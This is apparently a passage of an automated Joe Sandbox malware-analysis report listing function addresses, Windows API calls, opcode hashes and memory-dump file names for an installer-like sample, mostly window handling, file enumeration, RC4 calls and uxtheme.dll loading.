                                                                                • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                • String ID:
                                                                                • API String ID: 1177325624-0
                                                                                • Opcode ID: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                                                • Instruction ID: 40e29ed62a0e901db822078ff48c294e58af048427126d47a83bbc7ee0829aa9
                                                                                • Opcode Fuzzy Hash: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                                                • Instruction Fuzzy Hash: 4BF090B23A17207AF620B57A6C86F7F418CC785B68F10823BBB04FF1C1D9A85D05556D
                                                                                Function 004833BC Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 004833FA
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00483418
                                                                                • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048343A
                                                                                • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048344E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$IconicLong
                                                                                • String ID:
                                                                                • API String ID: 2754861897-0
                                                                                • Opcode ID: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                                                • Instruction ID: 9902e76ed030cf172564c6423cfc444f456bf65fce7539c2ce1f68efba32f602
                                                                                • Opcode Fuzzy Hash: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
                                                                                • Instruction Fuzzy Hash: 4D017134A452019EEB11BBA5DD8AB5B27C45F10B09F08083BB9029F2A3CB6D9D41D71C
                                                                                Function 00462ABC Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00462B90), ref: 00462B14
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B50
                                                                                • FindClose.KERNEL32(000000FF,00462B77,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 3541575487-0
                                                                                • Opcode ID: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                                                • Instruction ID: 0f193a6fcf1d943c675bf75123405c31ceeb2ecab595186adb6c93933d2a98b0
                                                                                • Opcode Fuzzy Hash: f304b7e405ec9403326d096206e821460da1cdcff9736e6297f3d959ba5c8769
                                                                                • Instruction Fuzzy Hash: 7121D871904B087EDB11DF65CC51ADEBBACDB49704F5084F7E808E31A1E6BCAE44CA5A
                                                                                Function 004241EC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 004241F4
                                                                                • SetActiveWindow.USER32(?,?,?,0046CFFB), ref: 00424201
                                                                                  • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                  • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021525AC,0042421A,?,?,?,0046CFFB), ref: 00423B5F
                                                                                • SetFocus.USER32(00000000,?,?,?,0046CFFB), ref: 0042422E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveFocusIconicShow
                                                                                • String ID:
                                                                                • API String ID: 649377781-0
                                                                                • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                • Instruction ID: 85e094fd83fda52d6ba69bb43f194f943737e29f022f28d5c3d7585fd8a6de7d
                                                                                • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                • Instruction Fuzzy Hash: ECF03A717001208BDB10EFAAA8C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                Function 00417CDE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 00417D1F
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Placement$Iconic
                                                                                • String ID:
                                                                                • API String ID: 568898626-0
                                                                                • Opcode ID: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                                                • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                • Opcode Fuzzy Hash: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
                                                                                • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                Function 004175A8 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureIconic
                                                                                • String ID:
                                                                                • API String ID: 2277910766-0
                                                                                • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                                • Instruction ID: edcb67aebd7cb7e0e4c3241a821d6ac110e093164443c601d5aebb18a23c44a8
                                                                                • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                                • Instruction Fuzzy Hash: A2F04F32304A028BDB21A72EC885AEB62F5DF84368B14443FE415CB765EB7CDCD58758
                                                                                Function 004241A4 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 004241AB
                                                                                  • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                  • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                  • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                  • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                  • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                • String ID:
                                                                                • API String ID: 2671590913-0
                                                                                • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                                • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                                • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                                • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                Function 004125E8 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                                                • Instruction ID: 2af12fea25256c3ae9471bae8fd4feed52cec15eb5e351c91de8273fd3ce68b3
                                                                                • Opcode Fuzzy Hash: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                                                • Instruction Fuzzy Hash: 055106316082058FD710DB6AD681A9BF3E5FF98304B2482BBD814C7392D7B8EDA1C759
                                                                                Function 004789DC Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478B2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                                                • Instruction ID: 518aae51b6d6b411e39a58dd47dc5b2362a2c83c3bfed1ee6c3543fdde473bb3
                                                                                • Opcode Fuzzy Hash: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                                                • Instruction Fuzzy Hash: 04413775644104DFCB10CF99C6898AAB7F5FB48310B74CA9AE848DB705DB38EE41DB54
                                                                                Function 0045D5A0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D5AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CryptFour
                                                                                • String ID:
                                                                                • API String ID: 2153018856-0
                                                                                • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                                • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                                                • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                                • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                                                Function 0045D5B8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DDBC,?,0046DF9D), ref: 0045D5BE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CryptFour
                                                                                • String ID:
                                                                                • API String ID: 2153018856-0
                                                                                • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                                • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                                                • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                                • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                                                Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3339656027.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000002.00000002.3339633117.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3339680534.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_10000000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3339656027.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000002.00000002.3339633117.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3339680534.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_10000000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 0044B668 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0044B614: GetVersionExA.KERNEL32(00000094), ref: 0044B631
                                                                                • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7D9
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7EB
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7FD
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B80F
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B821
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B833
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B845
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B857
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B869
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B87B
                                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B88D
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B89F
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8B1
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8C3
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8D5
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8E7
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8F9
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B90B
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B91D
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B92F
                                                                                • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B941
                                                                                • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B953
                                                                                • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B965
                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B977
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B989
                                                                                • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B99B
                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B9AD
                                                                                • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9BF
                                                                                • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9D1
                                                                                • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadVersion
                                                                                • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                • API String ID: 1968650500-2910565190
                                                                                • Opcode ID: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                                                • Instruction ID: 346aa6b979044c2d6f95573bc57da9b6801dc261a15d858c7a91061cf3dc2738
                                                                                • Opcode Fuzzy Hash: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                                                • Instruction Fuzzy Hash: CC91E7B0A40B50EBEF00EBF5ADC6A2637A8EB15B14714467BB444EF295D778D800CF99
